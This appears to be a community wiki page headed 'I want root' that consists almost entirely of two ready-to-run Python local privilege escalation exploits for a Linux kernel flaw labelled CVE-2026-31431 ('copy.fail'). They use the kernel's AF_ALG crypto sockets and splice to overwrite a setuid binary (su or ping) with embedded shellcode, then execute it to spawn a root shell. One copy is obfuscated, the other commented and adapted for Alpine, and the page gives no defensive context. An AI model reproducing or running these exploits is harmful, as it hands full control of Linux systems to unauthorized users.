Cybermuell Wiki

User Tools

Site Tools

Trace: i_want_root
i_want_root

This is an old revision of the document!

Table of Contents

I want root

cpoy.fail

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Alpine: 

#!/usr/bin/env python3

# CVE-2026-31431 a.k.a. copy.fail
# q3k fucked with this 2026/04/30

import os
import socket

# Write 4 bytes from c to f at t.
def c(f, t, c):
    a = socket.socket(38,5,0)
    a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
    h = 279
    a.setsockopt(h,1, bytes.fromhex('0800010000000010'+'0'*64))
    a.setsockopt(h,5,None,4)
    u, _ = a.accept()
    o= t+4
    i = b'\x00'
    u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768)
    r, w = os.pipe()
    os.splice(f,w,o,offset_src=0)
    os.splice(r,u.fileno(),o)
    try:
       u.recv(8+t)
    except:
       pass

# Some setuid and readable binary.
victim = "/bin/ping"
f = os.open(victim, 0)

# ELF  with setuid(0), execve(/bin/sh, [/bin/sh], 0), changed from upstream
# (which did execve(/bin/sh, 0, 0) which fails with multicall shell binaries
# eg. busybox on alpine).
e = bytes.fromhex('7f454c4602010100000000000000000002003e000100000038810200000000004000000000000000780000000000000000000000400038000100400003000200010000000500000000000000000000000080020000000000008002000000000070010000000000007001000000000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000080020000000000000000000000000081010000000000000000000000000000100000000000000000000000000000000700000003000000000000000000000070810200000000007001000000000000110000000000000000000000000000000100000000000000000000000000000031c031ffb0690f056a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05002e74657874002e736873747274616200')

# Smash victim with above ELF.
i = 0
while i<len(e):
    c(f,i,e[i:i+4])
    i += 4

# Exec into victim, suid, re-execs into sh, profit.
os.system(victim)

evil.sock

i_want_root.1777543086.txt.gz · Last modified: by phil